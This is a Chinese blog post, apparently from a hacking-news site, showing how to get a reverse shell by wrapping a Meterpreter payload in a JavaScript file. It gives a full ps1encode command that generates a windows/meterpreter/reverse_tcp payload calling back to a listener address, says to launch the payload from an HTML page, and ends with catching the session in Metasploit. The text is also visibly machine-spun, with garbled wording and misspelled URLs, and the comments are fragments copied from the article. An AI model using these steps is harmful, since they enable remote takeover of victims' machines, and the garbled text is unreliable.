利用前端JS文件反弹shell

利用前端JS文件反弹shell

入侵渗透hacker2019-07-12 22:27:3218873A+A-

前三天在freebuf上见到一个利用Ink文档促发进攻链的文章,的确钦佩创作者的脑洞大开。

htpp://www.freebuf.Com/articles/system/207109.hmtl

    网络时代无奇不有,多样式留后门,促发条件上升shell.操作够骚硬道理。

0x01:过程

一、利用工具

ActionScript

htpp://github.Com/CroweCybersecurity/ps1encode

二、环境配备

    它有很各种添加方式,敬请移步gayhub上查看

    今天利用添加的Js文档来上升shell

利用Js文档上升shell

ActionScript

指令:./ps1encode.rb--LHOST 192.168.124.11 --LPORT 6666 --PAYLOAD windows/meterpreter/reverse_tcp --ENCODE cmd -t Js

利用此指令添加Js文档

利用Js文档上升shell

    emmm!编码很长,自己拷贝出来放进txt编辑器里。

并重取名为1.Js(文件夹名称随意)。

利用Js文档上升shell

    单是放一个Js太有界了。实际环境下可以配合hmtl进行启用Js文档实行。

    

利用Js文档上升shell

    我简单的写了一个hmtl来启用Js文档

当然你也可以 一个Js就上升

利用Js文档上升shell

准备好msf回弹力的环境

实行exploit 等着监视实行

三、实行效果

利用Js文档上升shell

设计效果图

视频设计效果图

0x02:后话

    也许我的过程会出现错误、也许我的看法会出现错误。但是我的构思是人烟稀少的。我每一次写的文章想体现不是炫技,我跟每位比,我还是中学生,我也是小菜鸟。我要体现的是构思。如果之后有体现不清楚的,造成您的提出质疑,您可以跟我说,或者搜索引擎。


点击这里复制本文地址 以上内容由黑资讯整理呈现,请务必在转载分享时注明本文地址!如对内容有疑问,请联系我们,谢谢!
  • 3条评论
  • 纵遇橘亓2022-05-30 12:03:12
  • 不清楚的,造成您的提出质疑,您可以跟我说,或者搜索引擎。
  • 惑心一镜2022-05-30 10:01:48
  • sf回弹力的环境实行exploit 等着监视实行三、实行效果利用Js文档上升shell设计效果图视频设计效果图0x02:后话    也许我的过程会出现错误、也许我的看法会出
  • 冢渊礼忱2022-05-30 03:36:40
  •   我简单的写了一个hmtl来启用Js文档当然你也可以 一个Js就上升利用Js文档上升shell准备好msf回弹力的环境实行exploit 等着监视实行三、实行效果利用Js文档上升shell设计效果图视频设计效果图0x02:后话&nbs

支持Ctrl+Enter提交

黑资讯 © All Rights Reserved.  
Copyright Copyright 2015-2020 黑资讯
滇ICP备19002590号-1
Powered by 黑客资讯 Themes by 如有不合适之处联系我们
网站地图| 发展历程| 留言建议| 网站管理